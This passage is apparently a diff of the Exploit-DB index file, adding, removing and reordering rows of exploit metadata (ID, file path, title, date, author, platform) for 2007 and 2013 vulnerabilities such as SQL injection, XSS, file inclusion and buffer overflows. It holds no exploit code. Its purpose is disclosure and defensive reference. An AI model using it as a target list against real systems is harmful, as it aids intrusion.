Vulnerability",2007-05-25,newbinaryfile,php,webapps,0 30087,platforms/php/webapps/30087.txt,"Digirez 3.4 - Multiple Cross-Site Scripting Vulnerabilities",2007-05-25,Linux_Drox,php,webapps,0 30088,platforms/php/webapps/30088.txt,"Pligg 9.5 Reset Forgotten Password Security Bypass Vulnerability",2007-05-25,"242th section",php,webapps,0 30089,platforms/linux/remote/30089.txt,"Ruby on Rails 1.2.3 To_JSON - Script Injection Vulnerability",2007-05-25,BCC,linux,remote,0 -30090,platforms/php/webapps/30090.txt,"phpPgAdmin <= 4.1.1 Redirect.PHP Cross-Site Scripting Vulnerability",2007-05-25,"Michal Majchrowicz",php,webapps,0 30091,platforms/linux/dos/30091.py,"OpenOffice 2.2 Writer Component Remote Denial of Service Vulnerability",2007-05-28,shinnai,linux,dos,0 -30092,platforms/php/webapps/30092.txt,"FlashChat F_CMS 4.7.9 Parameter Multiple Remote File Include Vulnerabilities",2007-05-28,"Hasadya Raed",php,webapps,0 -30093,platforms/linux/local/30093.txt,"Mutt 1.4.2 Mutt_Gecos_Name Function Local Buffer Overflow Vulnerability",2007-05-28,raylai,linux,local,0 -30094,platforms/php/webapps/30094.txt,"DGNews 2.1 Footer.PHP Cross-Site Scripting Vulnerability",2007-05-28,"Jesper Jurcenoks",php,webapps,0 30095,platforms/php/webapps/30095.txt,"DGNews 1.5.1/2.1 News.PHP SQL Injection Vulnerability",2007-05-28,"Jesper Jurcenoks",php,webapps,0 30096,platforms/osx/local/30096.txt,"Apple Mac OS X <= 10.4.9 - VPND Local Format String Vulnerability",2007-05-29,"Chris Anley",osx,local,0 30097,platforms/php/webapps/30097.txt,"UebiMiau <= 2.7.10 demo/pop3/error.php selected_theme Parameter XSS",2007-05-29,"Michal Majchrowicz",php,webapps,0 30098,platforms/php/webapps/30098.txt,"UebiMiau <= 2.7.10 demo/pop3/error.php Multiple Variable Path Disclosure",2007-05-29,"Michal Majchrowicz",php,webapps,0 30099,platforms/php/webapps/30099.txt,"DGNews 2.1 NewsID Parameter SQL Injection Vulnerability",2007-05-28,"laurent gaffie",php,webapps,0 -30100,platforms/windows/remote/30100.html,"British Telecommunications Consumer Webhelper 2.0.0.7 - Multiple Buffer Overflow Vulnerabilities",2007-05-29,"Will Dormann",windows,remote,0 30101,platforms/php/webapps/30101.txt,"CPCommerce 1.1 Manufacturer.PHP SQL Injection Vulnerability",2007-05-29,"laurent gaffie",php,webapps,0 30102,platforms/php/webapps/30102.php,"Pheap 2.0 Config.PHP Pheap_Login Authentication Bypass Vulnerability",2007-05-30,Silentz,php,webapps,0 30103,platforms/php/webapps/30103.txt,"Particle Blogger <= 1.2.1 Archives.PHP SQL Injection Vulnerability",2007-03-16,Serapis.net,php,webapps,0 30104,platforms/windows/remote/30104.nasl,"F-Secure Policy Manager 7.00 FSMSH.DLL Remote Denial of Service Vulnerability",2007-05-30,"David Maciejak",windows,remote,0 -30105,platforms/php/webapps/30105.txt,"Wordpress Download Manager Free & Pro 2.5.8 - Persistent Cross-Site Scripting",2013-12-08,"Jeroen - IT Nerdbox",php,webapps,0 -30107,platforms/php/webapps/30107.txt,"Ovidentia 7.9.6 - Multiple Vulnerabilities",2013-12-08,sajith,php,webapps,0 -30109,platforms/php/webapps/30109.txt,"Particle Gallery 1.0 - Search.PHP Cross-Site Scripting Vulnerability",2007-05-30,Serapis.net,php,webapps,0 -30110,platforms/linux/dos/30110.c,"Bochs 2.3 - Buffer Overflow and Denial of Service Vulnerabilities",2007-05-31,"Tavis Ormandy",linux,dos,0 -30111,platforms/php/webapps/30111.txt,"MyBloggie 2.1.x Index.PHP Multiple SQL Injection Vulnerabilities",2007-05-31,ls@calima.serapis.net,php,webapps,0 -30112,platforms/php/webapps/30112.txt,"PHP JackKnife 2.21 (PHPJK) G_Display.php iCategoryUnq Parameter SQL Injection",2007-05-31,"laurent gaffie",php,webapps,0 -30113,platforms/php/webapps/30113.txt,"PHP JackKnife 2.21 (PHPJK) Search/DisplayResults.php iSearchID Parameter SQL Injection",2007-05-31,"laurent gaffie",php,webapps,0 -30114,platforms/php/webapps/30114.txt,"PHP JackKnife 2.21 (PHPJK) UserArea/Authenticate.php sUName Parameter XSS",2007-05-31,"laurent gaffie",php,webapps,0 -30115,platforms/php/webapps/30115.txt,"PHP JackKnife 2.21 (PHPJK) UserArea/NewAccounts/index.php sAccountUnq Parameter XSS",2007-05-31,"laurent gaffie",php,webapps,0 -30116,platforms/php/webapps/30116.txt,"PHP JackKnife 2.21 (PHPJK) G_Display.php Multiple Parameter XSS",2007-05-31,"laurent gaffie",php,webapps,0 -30117,platforms/php/remote/30117.php,"PHP <= 5.1.6 Chunk_Split() Function Integer Overflow Vulnerability",2007-05-31,"Gerhard Wagner",php,remote,0 -30118,platforms/php/webapps/30118.txt,"Prototype of an PHP application 0.1 gestion/index.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30119,platforms/php/webapps/30119.txt,"Prototype of an PHP application 0.1 ident/identification.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30120,platforms/php/webapps/30120.txt,"Prototype of an PHP application 0.1 ident/disconnect.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30121,platforms/php/webapps/30121.txt,"Prototype of an PHP application 0.1 ident/loginliste.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30122,platforms/php/webapps/30122.txt,"Prototype of an PHP application 0.1 ident/loginmodif.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30123,platforms/php/webapps/30123.txt,"Prototype of an PHP application 0.1 ident/index.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30124,platforms/php/webapps/30124.txt,"Prototype of an PHP application 0.1 ident/ident.inc.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30125,platforms/php/webapps/30125.txt,"Prototype of an PHP application 0.1 menu/menuprincipal.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30126,platforms/php/webapps/30126.txt,"Prototype of an PHP application 0.1 param/param.inc.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30127,platforms/php/webapps/30127.txt,"Prototype of an PHP application 0.1 plugins/phpgacl/index.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30128,platforms/php/webapps/30128.txt,"Prototype of an PHP application 0.1 index.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30129,platforms/php/webapps/30129.txt,"Prototype of an PHP application 0.1 common.inc.php path_inc Parameter Remote File Inclusion",2007-06-01,"pito pito",php,webapps,0 -30130,platforms/php/remote/30130.txt,"PHP <= 5.2.3 EXT/Session HTTP Response Header Injection Vulnerability",2007-06-04,"Stefan Esser",php,remote,0 -30131,platforms/php/webapps/30131.txt,"Buttercup WFM Title Parameter Cross-Site Scripting Vulnerability",2007-06-01,"John Martinelli",php,webapps,0 -30132,platforms/php/webapps/30132.txt,"Evenzia Content Management Systems (CMS) Cross-Site script Vulnerability",2007-06-01,"Glafkos Charalambous ",php,webapps,0 -30133,platforms/php/webapps/30133.txt,"PHPLive! 3.2.2 chat.php sid Parameter XSS",2007-06-01,ReZEN,php,webapps,0 -30134,platforms/php/webapps/30134.txt,"PHPLive! 3.2.2 help.php Multiple Parameter XSS",2007-06-01,ReZEN,php,webapps,0 -30135,platforms/php/webapps/30135.txt,"PHPLive! 3.2.2 admin/header.php admin[name] Parameter XSS",2007-06-01,ReZEN,php,webapps,0 -30136,platforms/php/webapps/30136.txt,"PHPLive! 3.2.2 super/info.php BASE_URL Variable Parameter XSS",2007-06-01,ReZEN,php,webapps,0 -30137,platforms/php/webapps/30137.txt,"PHPLive! 3.2.2 setup/footer.php Multiple Parameter XSS",2007-06-01,ReZEN,php,webapps,0 -30138,platforms/php/webapps/30138.txt,"Linker 2.0.4 Index.PHP Cross-Site Scripting Vulnerability",2007-06-02,vagrant,php,webapps,0 -30139,platforms/multiple/dos/30139.c,"Agnitum Outpost Firewall 4.0 Outpost_IPC_HDR Local Denial of Service Vulnerability",2007-06-04,"Matousec Transparent security",multiple,dos,0 -30140,platforms/php/webapps/30140.txt,"Okyanusmedya Index.PHP Cross-Site Scripting Vulnerability",2007-06-04,vagrant,php,webapps,0 -30141,platforms/asp/webapps/30141.txt,"Hunkaray Okul Portaly 1.1 Haberoku.ASP SQL Injection Vulnerability",2007-06-04,ertuqrul,asp,webapps,0 -30142,platforms/linux/remote/30142.txt,"GDB 6.6 - Process_Coff_Symbol UPX File Buffer Overflow Vulnerability",2007-06-04,"KaiJern Lau",linux,remote,0 -30143,platforms/php/webapps/30143.txt,"WebStudio CMS Index.PHP Cross-Site Scripting Vulnerability",2007-06-04,"Glafkos Charalambous ",php,webapps,0 -30144,platforms/windows/remote/30144.html,"eSellerate SDK 3.6.5 eSellerateControl365.DLL ActiveX Control Buffer Overflow Vulnerability",2007-06-04,shinnai,windows,remote,0 -30145,platforms/ios/webapps/30145.txt,"Feetan Inc WireShare 1.9.1 iOS - Persistent Vulnerability",2013-12-08,Vulnerability-Lab,ios,webapps,0 -30146,platforms/ios/webapps/30146.txt,"Print n Share 5.5 iOS - Multiple Web Vulnerabilities",2013-12-08,Vulnerability-Lab,ios,webapps,0 -30152,platforms/php/webapps/30152.txt,"My Databook diary.php delete Parameter SQL Injection",2007-06-04,Serapis.net,php,webapps,0 -30153,platforms/php/webapps/30153.txt,"My Databook diary.php year Parameter XSS",2007-06-04,Serapis.net,php,webapps,0 -30154,platforms/windows/local/30154.pl,"GOM Player 2.2.53.5169 - SEH Buffer Overflow (.reg)",2013-12-09,"Mike Czumak",windows,local,0 -30156,platforms/cgi/webapps/30156.txt,"CGILua <= 3.0 - SQL Injection",2013-12-09,"aceeeeeeeer .",cgi,webapps,0 -30157,platforms/php/webapps/30157.txt,"Joomla JD-Wiki 1.0.2 dwpage.php mosConfig_absolute_path Parameter Remote File Inclusion",2007-06-06,DarkbiteX,php,webapps,0 -30158,platforms/php/webapps/30158.txt,"Joomla JD-Wiki 1.0.2 wantedpages.php mosConfig_absolute_path Parameter Remote File Inclusion",2007-06-06,DarkbiteX,php,webapps,0 -30159,platforms/asp/webapps/30159.txt,"ASP Folder Gallery Download_Script.ASP Arbitrary File Download Vulnerability",2007-06-06,freeprotect.net,asp,webapps,0 -30160,platforms/windows/dos/30160.txt,"Microsoft Windows XP - GDI+ ICO File Remote Denial of Service Vulnerability",2007-06-06,"Dennis Rand",windows,dos,0 -30161,platforms/php/webapps/30161.txt,"Atom PhotoBlog 1.0.1/1.0.9AtomPhotoBlog.PHP Multiple Input Validation Vulnerabilities",2007-06-07,Serapis.net,php,webapps,0 -30162,platforms/php/webapps/30162.txt,"WMSCMS 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2007-06-07,"Glafkos Charalambous ",php,webapps,0 -30163,platforms/multiple/dos/30163.html,"Blue Coat Systems K9 Web Protection 32.36 - Remote Buffer Overflow Vulnerability",2007-06-08,"Dennis Rand",multiple,dos,0 -30164,platforms/hardware/remote/30164.txt,"3Com OfficeConnect Secure Router 1.04-168 Tk Parameter Cross-Site Scripting Vulnerability",2007-06-08,"Secunia Research",hardware,remote,0 -30165,platforms/asp/webapps/30165.txt,"Ibrahim ?AKICI Okul Portal 2.0 - Haber_Oku.ASP SQL Injection Vulnerability",2007-06-08,ertuqrul,asp,webapps,0 -30166,platforms/php/webapps/30166.txt,"WordPress 2.2 Request_URI Parameter Cross-Site Scripting Vulnerability",2007-06-08,zamolx3,php,webapps,0 -30167,platforms/hardware/dos/30167.txt,"Packeteer PacketShaper 7.x Web Interface Remote Denial of Service Vulnerability",2007-06-08,nnposter,hardware,dos,0 -30168,platforms/php/webapps/30168.txt,"vBSupport 2.0.0 Integrated Ticket System vBSupport.PHP SQL Injection Vulnerability",2007-06-09,rUnViRuS,php,webapps,0 -30169,platforms/windows/remote/30169.txt,"WindowsPT 1.2 User ID Key Spoofing Vulnerability",2007-06-11,nnposter,windows,remote,0 -30170,platforms/php/webapps/30170.txt,"Beehive Forum 0.7.1 Links.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-06-11,"Ory Segal",php,webapps,0 -30171,platforms/php/webapps/30171.txt,"JFFNms 0.8.3 - auth.php Multiple Parameter SQL Injection",2007-06-11,"Tim Brown",php,webapps,0 -30172,platforms/php/webapps/30172.txt,"JFFNms 0.8.3 - auth.php user Parameter XSS",2007-06-11,"Tim Brown",php,webapps,0 -30173,platforms/php/webapps/30173.txt,"JFFNms 0.8.3 admin/adm/test.php PHP Information Disclosure",2007-06-11,"Tim Brown",php,webapps,0 -30174,platforms/php/webapps/30174.txt,"JFFNms 0.8.3 admin/setup.php Direct Request Authentication Bypass",2007-06-11,"Tim Brown",php,webapps,0 -30175,platforms/php/webapps/30175.txt,"BBpress 0.8.1 BB-Login.PHP Cross-Site Scripting Vulnerability",2007-06-11,"Ory Segal",php,webapps,0 -30176,platforms/windows/remote/30176.html,"Apple Safari 3 for Windows Protocol Handler Command Injection Vulnerability",2007-06-12,"Thor Larholm",windows,remote,0 -30177,platforms/php/webapps/30177.txt,"PlaySms <= 0.9.9.2 - CSRF",2013-12-10,"Saadi Siddiqui",php,webapps,0 -30183,platforms/multiple/local/30183.txt,"Air Gallery 1.0 Air Photo Browser - Multiple Vulnerabilities",2013-12-10,Vulnerability-Lab,multiple,local,0 -30186,platforms/linux/remote/30186.txt,"Firebird SQL Fbserver 2.0 - Remote Buffer Overflow Vulnerability",2007-06-12,"Cody Pierce",linux,remote,0 -30187,platforms/multiple/dos/30187.txt,"Mbedthis AppWeb 2.2.2 URL Protocol Format String Vulnerability",2007-06-12,"Nir Rachmel",multiple,dos,0 -30188,platforms/windows/dos/30188.txt,"Apple Safari Feed URI Denial of Service Vulnerability",2007-05-13,"Moshe Ben-Abu",windows,dos,0 -30189,platforms/jsp/webapps/30189.txt,"Apache Tomcat <= 6.0.13 JSP Example Web Applications Cross-Site Scripting Vulnerability",2007-06-14,anonymous,jsp,webapps,0 -30190,platforms/php/webapps/30190.txt,"Joomla! Letterman Subscriber Module 1.2.4 Mod_Lettermansubscribe.PHP Cross-Site Scripting Vulnerability",2007-06-14,"Edi Strosar",php,webapps,0 -30191,platforms/jsp/webapps/30191.txt,"Apache MyFaces Tomahawk JSF Framework 1.1.5 Autoscroll Parameter Cross-Site Scripting Vulnerability",2007-06-14,"Rajat Swarup",jsp,webapps,0 -30192,platforms/windows/local/30192.txt,"Kaspersky Internet Security 6.0 - SSDT Hooks Multiple Local Vulnerabilities",2007-06-15,"Matousec Transparent security",windows,local,0 30193,platforms/windows/dos/30193.html,"Apple Safari 3.0.1 for Windows Corefoundation.DLL Denial of Service Vulnerability",2007-06-16,Lostmon,windows,dos,0 30194,platforms/windows/dos/30194.txt,"Apple Safari 3 for Windows Document.Location Denial of Service Vulnerability",2007-06-16,azizov,windows,dos,0 -30197,platforms/php/webapps/30197.txt,"WSPortal 1.0 Content.PHP SQL Injection Vulnerability",2007-06-18,"Jesper Jurcenoks",php,webapps,0 -30198,platforms/asp/webapps/30198.txt,"TDizin Arama.ASP Cross-Site Scripting Vulnerability",2007-06-18,GeFORC3,asp,webapps,0 -30199,platforms/cgi/webapps/30199.txt,"WebIf OutConfig Parameter Local File Include Vulnerability",2007-06-18,maiosyet,cgi,webapps,0 -30200,platforms/php/webapps/30200.txt,"PHP Hosting Biller 1.0 Index.PHP Cross-Site Scripting Vulnerability",2007-08-18,Serapis.net,php,webapps,0 -30201,platforms/php/webapps/30201.txt,"Fuzzylime 1.0 Low.PHP Cross-Site Scripting Vulnerability",2007-06-18,RMx,php,webapps,0 -30202,platforms/cfm/webapps/30202.txt,"FuseTalk 2.0/3.0 - AuthError.CFM SQL Injection Vulnerability",2007-06-19,"Ivan Almuina",cfm,webapps,0 -30203,platforms/asp/webapps/30203.txt,"Comersus Cart 7.0.7 comersus_optReviewReadExec.asp id Parameter SQL Injection",2007-06-20,Doz,asp,webapps,0 -30204,platforms/asp/webapps/30204.txt,"Comersus Cart 7.0.7 comersus_customerAuthenticateForm.asp redirectUrl XSS",2007-06-20,Doz,asp,webapps,0 -30205,platforms/asp/webapps/30205.txt,"Comersus Cart 7.0.7 Cart comersus_message.asp redirectUrl XSS",2007-06-20,Doz,asp,webapps,0 -30206,platforms/cfm/webapps/30206.txt,"FuseTalk <= 4.0 forum/include/common/comfinish.cfm FTVAR_SCRIPTRUN Parameter XSS",2007-06-20,"Ivan Almuina",cfm,webapps,0 -30207,platforms/asp/webapps/30207.txt,"FuseTalk <= 4.0 blog/include/common/comfinish.cfm FTVAR_SCRIPTRUN Parameter XSS",2007-06-20,"Ivan Almuina",asp,webapps,0 -30208,platforms/windows/dos/30208.txt,"IcoFX 2.5.0.0 - (.ico) Buffer Overflow Vulnerability",2013-12-11,"Core Security",windows,dos,0 30209,platforms/windows/remote/30209.rb,"HP LoadRunner EmulationAdmin - Web Service Directory Traversal",2013-12-11,metasploit,windows,remote,8080 30210,platforms/multiple/remote/30210.rb,"Adobe ColdFusion 9 - Administrative Login Bypass",2013-12-11,metasploit,multiple,remote,80 30211,platforms/windows/remote/30211.txt,"EMC Data Protection Advisor DPA Illuminator - EJBInvokerServlet RCE",2013-12-11,rgod,windows,remote,0 30212,platforms/php/remote/30212.rb,"vBulletin 5 - index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection",2013-12-11,metasploit,php,remote,80 30213,platforms/php/webapps/30213.txt,"eFront 3.6.14 (build 18012) - Stored XSS in Multiple Parameters",2013-12-11,sajith,php,webapps,0 30215,platforms/ios/webapps/30215.txt,"Photo Video Album Transfer 1.0 iOS - Multiple Vulnerabilities",2013-12-11,Vulnerability-Lab,ios,webapps,0 +30283,platforms/php/webapps/30283.txt,"SquirrelMail G/PGP Encryption Plug-in 2.0/2.1 - Multiple Unspecified Remote Command Execution Vulnerabilities",2007-07-09,"Stefan Esser",php,webapps,0 30216,platforms/cfm/webapps/30216.txt,"FuseTalk <= 4.0 - AuthError.CFM Multiple Cross-Site Scripting Vulnerabilities",2007-06-20,"Ivan Almuina",cfm,webapps,0 30217,platforms/php/webapps/30217.txt,"Wrapper.PHP for OsCommerce Local File Include Vulnerability",2007-06-20,"Joe Bloomquist",php,webapps,0 30218,platforms/multiple/remote/30218.txt,"BugHunter HTTP Server 1.6.2 Parse Error Information Disclosure Vulnerability",2007-06-20,Prili,multiple,remote,0 @@ -27129,8 +27173,9 @@ id,file,description,date,author,platform,type,port 30235,platforms/php/webapps/30235.txt,"KikChat - (LFI/RCE) Multiple Vulnerability",2013-12-12,"cr4wl3r ",php,webapps,0 30237,platforms/hardware/local/30237.sh,"Cisco Unified Communications Manager - TFTP Service",2013-12-12,"daniel svartman",hardware,local,0 30238,platforms/php/webapps/30238.txt,"Cythosia 2.x Botnet - SQL Injection Vulnerability",2013-12-12,GalaxyAndroid,php,webapps,0 +30366,platforms/php/webapps/30366.txt,"AlstraSoft Video Share Enterprise 4.x - Multiple Input Validation Vulnerabilities",2007-07-23,Lostmon,php,webapps,0 30244,platforms/windows/local/30244.py,"Castripper 2.50.70 - (.pls) DEP Exploit",2013-12-12,"Morteza Hashemi",windows,local,0 -30245,platforms/ios/webapps/30245.txt,"Phone Drive Eightythree 4.1.1 iOS - Multiple Vulnerabilities",2013-12-12,Vulnerability-Lab,ios,webapps,0 +30284,platforms/linux/remote/30284.vbs,"Sun Java Runtime Environment 1.6 - Web Start JNLP File Stack Buffer Overflow Vulnerability",2007-07-09,"Daniel Soeder",linux,remote,0 30246,platforms/php/webapps/30246.txt,"WHMCS 4.x & 5.x - Multiple Web Vulnerabilities",2013-12-12,"AhwAk20o0 --",php,webapps,0 30248,platforms/hardware/webapps/30248.txt,"Pentagram Cerberus P 6363 DSL Router - Multiple Vulnerabilities",2013-12-12,condis,hardware,webapps,0 30249,platforms/php/webapps/30249.txt,"Papoo 1.0.3 Plugin.PHP Authentication Bypass Vulnerability",2007-06-27,"Nico Leidecker",php,webapps,0 @@ -27166,8 +27211,6 @@ id,file,description,date,author,platform,type,port 30280,platforms/linux/local/30280.txt,"GFax 0.7.6 Temporary Files Local Arbitrary Command Execution Vulnerability",2007-07-05,"Steve Kemp",linux,local,0 30281,platforms/windows/remote/30281.txt,"Microsoft .Net Framework <= 2.0 - Multiple Null Byte Injection Vulnerabilities",2007-07-06,"Paul Craig",windows,remote,0 30282,platforms/asp/webapps/30282.txt,"Levent Veysi Portal 1.0 Oku.ASP SQL Injection Vulnerability",2007-07-07,GeFORC3,asp,webapps,0 -30283,platforms/php/webapps/30283.txt,"SquirrelMail G/PGP Encryption Plug-in 2.0/2.1 - Multiple Unspecified Remote Command Execution Vulnerabilities",2007-07-09,"Stefan Esser",php,webapps,0 -30284,platforms/linux/remote/30284.vbs,"Sun Java Runtime Environment 1.6 - Web Start JNLP File Stack Buffer Overflow Vulnerability",2007-07-09,"Daniel Soeder",linux,remote,0 30285,platforms/linux/remote/30285.txt,"Microsoft Internet Explorer and Mozilla Firefox URI Handler Command Injection Vulnerability",2007-07-10,"Thor Larholm",linux,remote,0 30286,platforms/linux/remote/30286.txt,"ImgSvr 0.6 Template Parameter Local File Include Vulnerability",2007-07-10,"Tim Brown",linux,remote,0 30287,platforms/windows/remote/30287.txt,"TippingPoint IPS Unicode Character Detection Bypass Vulnerability",2007-07-10,Security-Assessment.com,windows,remote,0 @@ -27187,7 +27230,19 @@ id,file,description,date,author,platform,type,port 30301,platforms/php/webapps/30301.txt,"Dating Gold 3.0.5 header.php int_path Parameter Remote File Inclusion",2007-07-13,mostafa_ragab,php,webapps,0 30302,platforms/php/webapps/30302.txt,"Dating Gold 3.0.5 footer.php int_path Parameter Remote File Inclusion",2007-07-13,mostafa_ragab,php,webapps,0 30303,platforms/php/webapps/30303.txt,"Dating Gold 3.0.5 secure.admin.php int_path Parameter Remote File Inclusion",2007-07-13,mostafa_ragab,php,webapps,0 +30393,platforms/win64/local/30393.rb,"Nvidia (nvsvc) Display Driver Service - Local Privilege Escalation",2013-12-17,metasploit,win64,local,0 +30383,platforms/php/webapps/30383.txt,"Vikingboard Viking board 0.1.2 cp.php Multiple Parameter XSS",2007-07-25,Lostmon,php,webapps,0 +30384,platforms/php/webapps/30384.txt,"Vikingboard Viking board 0.1.2 user.php u Parameter XSS",2007-07-25,Lostmon,php,webapps,0 +30385,platforms/php/webapps/30385.txt,"Vikingboard Viking board 0.1.2 post.php Multiple Parameter XSS",2007-07-25,Lostmon,php,webapps,0 +30386,platforms/php/webapps/30386.txt,"Vikingboard Viking board 0.1.2 topic.php s Parameter XSS",2007-07-25,Lostmon,php,webapps,0 +30387,platforms/php/webapps/30387.txt,"Vikingboard Viking board 0.1.2 forum.php debug Variable Information Disclosure",2007-07-25,Lostmon,php,webapps,0 +30388,platforms/php/webapps/30388.txt,"Vikingboard Viking board 0.1.2 cp.php debug Variable Information Disclosure",2007-07-25,Lostmon,php,webapps,0 +30389,platforms/php/webapps/30389.txt,"iFoto 1.0 Index.PHP Directory Traversal Vulnerability",2007-07-25,Lostmon,php,webapps,0 +30390,platforms/php/webapps/30390.txt,"BSM Store Dependent Forums 1.02 UserName Parameter SQL Injection Vulnerability",2007-07-26,"Aria-Security Team",php,webapps,0 +30391,platforms/php/webapps/30391.txt,"PhpHostBot 1.05 - Authorize.PHP Remote File Include Vulnerability",2007-07-26,S4M3K,php,webapps,0 +30392,platforms/windows/local/30392.rb,"Microsoft Windows ndproxy.sys - Local Privilege Escalation",2013-12-17,metasploit,windows,local,0 30308,platforms/windows/local/30308.py,"PotPlayer 1.5.42509 Beta - DoS (Integer Division by Zero Exploit)",2013-12-15,sajith,windows,local,0 +30801,platforms/php/webapps/30801.txt,"Bandersnatch 0.4 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-11-23,"Tim Brown",php,webapps,0 30310,platforms/php/webapps/30310.txt,"Piwigo 2.5.3 CMS - Multiple Web Vulnerabilities",2013-12-15,sajith,php,webapps,0 30311,platforms/ios/webapps/30311.txt,"Phone Drive Eightythree 4.1.1 iOS - Multiple Vulnerabilities",2013-12-15,Vulnerability-Lab,ios,webapps,0 30312,platforms/php/webapps/30312.txt,"Citadel WebCit 7.02/7.10 showuser who Parameter XSS",2007-07-14,"Christopher Schwardt",php,webapps,0 @@ -27200,9 +27255,10 @@ id,file,description,date,author,platform,type,port 30319,platforms/linux/remote/30319.c,"tcpdump Print-bgp.C Remote Integer Underflow Vulnerability",2007-03-01,mu-b,linux,remote,0 30320,platforms/php/webapps/30320.txt,"geoBlog MOD_1.0 deletecomment.php id Variable Remote Arbitrary Comment Deletion",2007-07-19,joseph.giron13,php,webapps,0 30321,platforms/php/webapps/30321.txt,"geoBlog MOD_1.0 deleteblog.php id Variable Remote Arbitrary Blog Deletion",2007-07-19,joseph.giron13,php,webapps,0 -30322,platforms/windows/remote/30322.rb,"Lighttpd <= 1.4.15 - Multiple Code Execution, Denial of Service and Information Disclosure Vulnerabilities",2007-04-16,"Abhisek Datta",windows,remote,0 +30322,platforms/windows/remote/30322.rb,"Lighttpd <= 1.4.15 - Multiple Code Execution_ Denial of Service and Information Disclosure Vulnerabilities",2007-04-16,"Abhisek Datta",windows,remote,0 30323,platforms/php/webapps/30323.txt,"UseBB 1.0.7 install/upgrade-0-2-3.php PHP_SELF Parameter XSS",2007-07-20,s4mi,php,webapps,0 30324,platforms/php/webapps/30324.txt,"UseBB 1.0.7 install/upgrade-0-3.php PHP_SELF Parameter XSS",2007-07-20,s4mi,php,webapps,0 +30978,platforms/php/webapps/30978.txt,"WordPress <= 2.2.3 wp-admin/page-new.php popuptitle Parameter XSS",2008-01-03,3APA3A,php,webapps,0 30327,platforms/asp/webapps/30327.html,"Dora Emlak 1.0 Script Multiple Input Validation Vulnerabilities",2007-07-23,GeFORC3,asp,webapps,0 30328,platforms/asp/webapps/30328.txt,"Alisveris Sitesi Scripti Index.ASP SQL Injection Vulnerabilities",2007-07-23,GeFORC3,asp,webapps,0 30329,platforms/php/webapps/30329.sh,"Gitlab 6.0 - Persistent XSS",2013-12-16,hellok,php,webapps,0 @@ -27210,40 +27266,31 @@ id,file,description,date,author,platform,type,port 30331,platforms/asp/webapps/30331.html,"ASP cvmatik 1.1 - Multiple HTML Injection Vulnerabilities",2007-07-23,GeFORC3,asp,webapps,0 30332,platforms/asp/webapps/30332.txt,"Image Racer SearchResults.ASP SQL Injection Vulnerability",2007-07-23,"Aria-Security Team",asp,webapps,0 30333,platforms/php/webapps/30333.txt,"PHMe 0.0.2 Function_List.PHP Local File Include Vulnerability",2007-07-23,You_You,php,webapps,0 -30336,platforms/windows/local/30336.py,"VUPlayer 2.49 - (.M3U) Universal Buffer Overflow (DEP Bypass)",2013-12-16,"Morteza Hashemi",windows,local,0 -30356,platforms/php/webapps/30356.txt,"Wallpaper Script 3.5.0082 - Stored XSS Vulnerability",2013-12-16,"null pointer",php,webapps,0 -30357,platforms/php/webapps/30357.txt,"iScripts MultiCart <= 2.4 - Persistent XSS / CSRF / XSS+CSRF Mass Accounts takeover",2013-12-16,"Saadi Siddiqui",php,webapps,0 -30358,platforms/hardware/webapps/30358.txt,"UPC Ireland Cisco EPC 2425 Router / Horizon Box",2013-12-16,"Matt O'Connor",hardware,webapps,0 -30361,platforms/hardware/webapps/30361.txt,"Beetel TC1-450 Airtel Wireless Router - Multiple CSRF Vulnerabilities",2013-12-16,"Samandeep Singh",hardware,webapps,0 -30362,platforms/hardware/webapps/30362.txt,"Cisco EPC3925 - Cross-Site Request Forgery",2013-12-16,"Jeroen - IT Nerdbox",hardware,webapps,0 -30364,platforms/php/webapps/30364.txt,"Lowest Unique Bid Auction - SQL Injection Vulnerabilities",2013-12-16,3spi0n,php,webapps,0 -30365,platforms/php/webapps/30365.txt,"Penny Auction 5 - SQL Injection Vulnerabilities",2013-12-16,3spi0n,php,webapps,0 -30366,platforms/php/webapps/30366.txt,"AlstraSoft Video Share Enterprise 4.x - Multiple Input Validation Vulnerabilities",2007-07-23,Lostmon,php,webapps,0 -30367,platforms/php/webapps/30367.txt,"AlstraSoft Sms Text Messaging Enterprise 2.0 admin/membersearch.php Multiple Parameter XSS",2007-07-23,Lostmon,php,webapps,0 -30368,platforms/php/webapps/30368.txt,"AlstraSoft Sms Text Messaging Enterprise 2.0 admin/edituser.php userid Parameter XSS",2007-07-23,Lostmon,php,webapps,0 -30369,platforms/php/webapps/30369.txt,"AlstraSoft Affiliate Network Pro 8.0 merchants/index.php Multiple Parameter XSS",2007-07-23,Lostmon,php,webapps,0 -30370,platforms/php/webapps/30370.txt,"AlstraSoft Affiliate Network Pro 8.0 merchants/temp.php rowid Parameter XSS",2007-07-23,Lostmon,php,webapps,0 -30371,platforms/php/webapps/30371.txt,"AlstraSoft Affiliate Network Pro 8.0 merchants/index.php uploadProducts Action pgmid Parameter SQL Injection",2007-07-23,Lostmon,php,webapps,0 -30373,platforms/windows/remote/30373.py,"Ability Mail Server 2013 (3.1.1) - Stored XSS (Web UI)",2013-12-17,"David Um",windows,remote,0 -30374,platforms/windows/local/30374.txt,"QuickHeal AntiVirus 7.0.0.1 - Stack Overflow Vulnerability",2013-12-17,"Arash Allebrahim",windows,local,0 -30375,platforms/ios/webapps/30375.txt,"FileMaster SY-IT 3.1 iOS - Multiple Web Vulnerabilities",2013-12-17,Vulnerability-Lab,ios,webapps,0 +30382,platforms/asp/webapps/30382.txt,"W1L3D4 Philboard 0.3 W1L3D4_Aramasonuc.ASP Cross-Site Scripting Vulnerability",2007-07-25,GeFORC3,asp,webapps,0 30378,platforms/php/webapps/30378.txt,"Webbler CMS 